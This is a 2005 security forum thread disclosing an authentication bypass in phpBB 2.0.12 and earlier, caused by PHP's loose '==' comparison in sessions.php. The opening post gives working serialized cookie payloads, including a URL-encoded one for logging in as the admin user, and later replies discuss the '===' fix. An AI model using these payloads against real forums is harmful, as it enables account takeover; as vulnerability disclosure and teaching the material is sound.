|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 67
Members: 0
Total: 67
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
phpbb v. 2.0.12 and earlier authendication bypass |
|
Posted: Sat Feb 26, 2005 11:20 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
Bug author: Heintz (Henno Joosep)
Related site: http://www.waraxe.us
Date of finding: 24.02.2005
problem is in sessions.php which is in /includes catalog.
$sessiondata = isset($HTTP_COOKIE_VARS[$cookiename . '_data']) ? unserialize(stripslashes($HTTP_COOKIE_VARS[$cookiename . '_data'])) : array();
here we see an array unserialized
if( $sessiondata['autologinid'] == $auto_login_key )
{
// autologinid matches password
$login = 1;
$enable_autologin = 1;
}
problem is with if() using == operator which considers the statement
true if one side is boolean(true), and that we can achive by unserializing
a bool instead of empty string.
exploitation:
this can be normal admin session cookie.
a:2:{s:11:"autologinid";s:0:"";s:6:"userid";s:1:"2";}
attacker would make array with autologinid as key to boolean(tru) so:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"2";}
to this to work in real situation it must be urlencoded, and this is how it should look like to
obtain a user with id 2 (usually admin):
a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D
to change the users id bigger, change the
number in end,
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:1:"7";}
if dealing with higher ids you must specify s:N (N as how many decimal places id has)
example below:
a:2:{s:11:"autologinid";b:1;s:6:"userid";s:4:"1234";}
i stated using "===" as contitional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).
originaly i tryed/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).
Notes:
software authors decided to not to credit me cause i posted info public,
not giving them enought time,
-- brought up -- |
|
Last edited by Heintz on Sat Apr 09, 2005 5:46 pm; edited 4 times in total _________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
|
|
|
|
Posted: Sun Feb 27, 2005 3:32 pm |
|
|
LINUX |
Moderator |
|
|
Joined: May 24, 2004 |
Posts: 404 |
Location: Caiman |
|
|
|
|
|
|
full test and work perfect exellent work |
|
|
|
|
Posted: Sun Feb 27, 2005 5:28 pm |
|
|
Injector |
Active user |
|
|
Joined: Dec 29, 2004 |
Posts: 49 |
|
|
|
|
|
|
|
i decoded both and tried to analyze it but still i dont get how to do it. What if I dont want user id 2 what if I want user id 7. How do i do such? |
|
|
|
|
Posted: Mon Feb 28, 2005 12:31 am |
|
|
Grullanetx |
Beginner |
|
|
Joined: Feb 18, 2005 |
Posts: 2 |
|
|
|
|
|
|
|
|
|
|
|
Posted: Mon Feb 28, 2005 4:37 am |
|
|
Exoduks |
Beginner |
|
|
Joined: Jan 12, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
Does anyone now how to exploit this session hendeling bug ? |
|
|
|
|
Posted: Mon Feb 28, 2005 5:13 am |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
hum, nice research youve done there
ive try to download that version, but the development team allready update it
now i try a new one (2.0.13)
long time no play with PHPbb (eventhough my forum ise it too ) |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
For comparing Strings use === |
|
Posted: Mon Feb 28, 2005 8:40 am |
|
|
Zeelock |
Active user |
|
|
Joined: Jan 27, 2005 |
Posts: 29 |
Location: Where stars come out at night |
|
|
|
|
|
|
Heintz Great Job.
Even if it's a common trick and well documented I didn't notice it yet ( ).
This error is very common in converting perl scripts into php.
For more info:
http://www.php.net/manual/it/language.operators.comparison.php
Quote: | jwhiting at hampshire dot edu
09-Dec-2003 06:31
note: the behavior below is documented in the appendix K about type comparisons, but since it is somewhat buried i thought i should raise it here for people since it threw me for a loop until i figured it out completely.
just to clarify a tricky point about the == comparison operator when dealing with strings and numbers:
('some string' == 0) returns TRUE
however, ('123' == 0) returns FALSE
also note that ((int) 'some string') returns 0
and ((int) '123') returns 123
the behavior makes senes but you must be careful when comparing strings to numbers, e.g. when you're comparing a request variable which you expect to be numeric. its easy to fall into the trap of:
if ($_GET['myvar']==0) dosomething();
as this will dosomething() even when $_GET['myvar'] is 'some string' and clearly not the value 0
i was getting lazy with my types since php vars are so flexible, so be warned to pay attention to the details... |
Exploit n. 2 Censored..... |
|
Last edited by Zeelock on Mon Feb 28, 2005 1:54 pm; edited 6 times in total _________________ If it seems to be impossible, just step up your level! |
|
|
|
|
|
|
|
Posted: Mon Feb 28, 2005 10:37 am |
|
|
sygma |
Regular user |
|
|
Joined: Nov 21, 2004 |
Posts: 7 |
|
|
|
|
|
|
|
why was the info censored ? could someone please PM the info ? thanks. |
|
_________________ [i]no word to save thee[/i] |
|
|
|
Posted: Mon Feb 28, 2005 11:03 am |
|
|
Zeelock |
Active user |
|
|
Joined: Jan 27, 2005 |
Posts: 29 |
Location: Where stars come out at night |
|
|
|
|
|
|
I think that Janek censored the message, because it's really harmful at the moment |
|
_________________ If it seems to be impossible, just step up your level! |
|
|
|
|
|
|
|
Posted: Mon Feb 28, 2005 1:51 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
i was the one censoring it, cause phpbb guys didn't like the idea posting before/same time about the issue.
and i would appreciate if we do not provide explotation info in some ammount of time (2 days).
i thought of better of people but it seems there just too many script kiddies outside who start making damage whenever possible.
http://www.phpbb.com/phpBB/viewtopic.php?t=267563 |
|
Last edited by Heintz on Mon Feb 28, 2005 3:37 pm; edited 1 time in total _________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
Posted: Mon Feb 28, 2005 1:53 pm |
|
|
Zeelock |
Active user |
|
|
Joined: Jan 27, 2005 |
Posts: 29 |
Location: Where stars come out at night |
|
|
|
|
|
|
If you want I'll censor the info as well |
|
_________________ If it seems to be impossible, just step up your level! |
|
|
|
Posted: Thu Mar 03, 2005 1:05 pm |
|
|
Heintz |
Valuable expert |
|
|
Joined: Jun 12, 2004 |
Posts: 88 |
Location: Estonia/Sweden |
|
|
|
|
|
|
---move---
Notes:
software authors decided to not to credit me cause i posted info public,
not giving them enought time, |
|
Last edited by Heintz on Wed May 04, 2005 1:26 am; edited 2 times in total _________________ AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!" |
|
|
|
Posted: Thu Mar 03, 2005 2:23 pm |
|
|
lone_wolf |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 9 |
|
|
|
|
|
|
|
Heintz, what exactly triple equal from "quick fix" do? Is there some way to cheat it? |
|
|
|
|
Posted: Thu Mar 03, 2005 2:39 pm |
|
|
lone_wolf |
Regular user |
|
|
Joined: Feb 20, 2005 |
Posts: 9 |
|
|
|
|
|
|
|
This looks pritty hopeless (from "Boolean - manual):
/* Note the triple equal sign, this is the "exactly equal to" operator,
which checks NOT JUST FOR EQUALITY, BUT FOR TYPE. Using it
ensures that $bool doesn't get converted to a boolean
for the comparison: $bool===true is only true
if $bool is a true boolean, whereas $bool==true
is true for any non-empty string (except "0").
*/ |
|
|
|
|
|
|
|
|
Posted: Sun Mar 13, 2005 4:42 pm |
|
|
y3dips |
Valuable expert |
|
|
Joined: Feb 25, 2005 |
Posts: 281 |
Location: Indonesia |
|
|
|
|
|
|
Heintz wrote: |
<-- message truncated --->
i stated using "===" as contitional operator as a "quick fix", which phpbb
team used (they didn't have time to explore the bug in depth, look below for notes).
originaly i tryed/explored advantages to use unserialize
to unserialize database objects, but using objects as arrays creates fatal error
(possible full path disclosure???).
Notes:
software authors decided to not to credit me cause i posted info public,
thus not giving them enought time (big mistake by me), and therefore there may be stealers
claiming the bug to be theyrs. |
have another way to fix it, coz i found the same error as you do |
|
_________________ IO::y3dips->new(http://clog.ammar.web.id); |
|
|
|
|
www.waraxe.us Forum Index -> PhpBB
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 2
Goto page 1, 2Next
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|